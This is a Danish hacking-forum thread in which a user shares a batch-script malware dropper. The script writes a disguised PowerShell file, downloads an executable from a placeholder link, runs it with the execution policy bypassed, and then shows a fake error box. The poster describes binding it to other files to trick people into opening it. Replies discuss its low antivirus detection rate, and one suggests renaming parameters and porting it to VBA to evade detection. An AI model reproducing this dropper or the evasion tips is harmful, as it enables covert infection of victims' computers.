Log ind

**$$$** · 02-02-2016, 20:15

Bare lige et lille batchscript jeg har liggende som downloader en fil til /temp/file og derefter executer den så du for en succesfull installation af din fil
Filen skal selvfølgelig helst være Runtime FUD men selv filer med detektioner kommer ofte igennem.

Batch scripted er lidt tricky at få folk til at åbne, men den kan da bindes til en anden fil.

Destinationen på filen kan ændres i scripted med lidt basal batch script forståelse.

Kode:
@echo off

mkdir %tmp%\file\  > nul 2> nul

echo Please wait, loading...

echo $down = New-Object System.Net.WebClient > %tmp%\file\flash_log_backup.ps1

echo $url  = 'INDSÆT DIRECT DOWNLOAD LINK HER'; >> %tmp%\file\flash_log_backup.ps1

echo $file = '%tmp%\file\flash_log_backup.exe'; >> %tmp%\file\flash_log_backup.ps1

echo $down.DownloadFile($url,$file); >> %tmp%\file\flash_log_backup.ps1

echo $exec = New-Object -com shell.application >> %tmp%\file\flash_log_backup.ps1

echo $exec.shellexecute($file); >> %tmp%\file\flash_log_backup.ps1

powershell.exe -executionpolicy bypass -file %tmp%\file\flash_log_backup.ps1

echo msgbox "ERR?R!" > %tmp%\tmp.vbs

cscript /nologo %tmp%\tmp.vbs

del %tmp%\tmp.vbs

exit

**$$$** · 26-04-2019, 23:46

Og 3 år efter er det 1/57

Utroligt at AV ikke vil genkende så simpelt et script

Spagnum · 29-04-2019, 09:46

batch til at køre PS.. tjaaa baaah...

duckman · 29-04-2019, 21:51

(26-04-2019, 23:46)$$$ Skrev: Og 3 år efter er det 1/57

Utroligt at AV ikke vil genkende så simpelt et script

Hvad skulle en AV genkende?
Det er bestemt ikke malware... Det er et meget simpelt script, af en type og funktionalitet som bruges til administrative funktioner i rigtigt mange sammenhænge.
At tro at dette skulle være andet en FUD ville være en fejltagelse, og at se en enkelt på VT virker underligt. Scriptet laver ikke noget du ikke kunne klarer på utroligt mange måder. Skriv det som VBA og skift option-parameter navne så fjerne du nok den ene detection.

**$$$** · 06-05-2019, 13:42

(29-04-2019, 21:51)duckman Skrev: Hvad skulle en AV genkende?
Det er bestemt ikke malware... Det er et meget simpelt script, af en type og funktionalitet som bruges til administrative funktioner i rigtigt mange sammenhænge.
At tro at dette skulle være andet en FUD ville være en fejltagelse, og at se en enkelt på VT virker underligt. Scriptet laver ikke noget du ikke kunne klarer på utroligt mange måder. Skriv det som VBA og skift option-parameter navne så fjerne du nok den ene detection.

Du har nok ret, jeg har ikke rigtigt rodet så meget med batch, og da slet ikke i forbindelse med malware, det dog en forholdsvis effektiv måde at droppe en .exe på. Skrev det for længe siden, og du har ret, der jo egentlig ikke noget der skriger malware i det.

Det har da også et ret begrænset brug, og er helt sikkert ikke raket videnskab, men handy at have liggende til refference osv.

Log ind
Brugernavn
Kodeord:	Glemt kodeord?
	Husk mig